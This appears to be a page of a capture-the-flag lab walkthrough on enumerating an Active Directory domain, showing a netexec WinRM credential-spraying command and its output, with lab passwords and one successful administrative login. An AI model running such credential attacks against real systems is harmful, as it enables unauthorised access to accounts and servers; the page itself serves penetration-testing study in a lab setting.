AD Enumeration

WinRM

Using the two usernames and passwords we know.

netexec winrm ../../hosts -u usernames -p passwords --no-bruteforce --continue-on-success 
WINRM       192.168.110.54  5985   PNT-SVRPSB       [*] Windows Server 2022 Build 20348 (name:PNT-SVRPSB) (domain:painters.htb)
WINRM       192.168.110.53  5985   PNT-SVRBPA       [*] Windows Server 2022 Build 20348 (name:PNT-SVRBPA) (domain:painters.htb)
WINRM       192.168.110.55  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:painters.htb)
WINRM       192.168.110.52  5985   PNT-SVRSVC       [*] Windows Server 2022 Build 20348 (name:PNT-SVRSVC) (domain:painters.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.110.54  5985   PNT-SVRPSB       [-] painters.htb\riley:P@ssw0rd
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.110.54  5985   PNT-SVRPSB       [-] painters.htb\web_svc:!QAZ1qaz
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.110.55  5985   DC               [-] painters.htb\riley:P@ssw0rd
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.110.55  5985   DC               [-] painters.htb\web_svc:!QAZ1qaz
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.110.53  5985   PNT-SVRBPA       [-] painters.htb\riley:P@ssw0rd
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.110.53  5985   PNT-SVRBPA       [-] painters.htb\web_svc:!QAZ1qaz
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.110.52  5985   PNT-SVRSVC       [-] painters.htb\riley:P@ssw0rd
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.110.52  5985   PNT-SVRSVC       [+] painters.htb\web_svc:!QAZ1qaz (Pwn3d!)
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Bloodhound

PreviousNmapNextZEPHYR-PNTDC

Last updated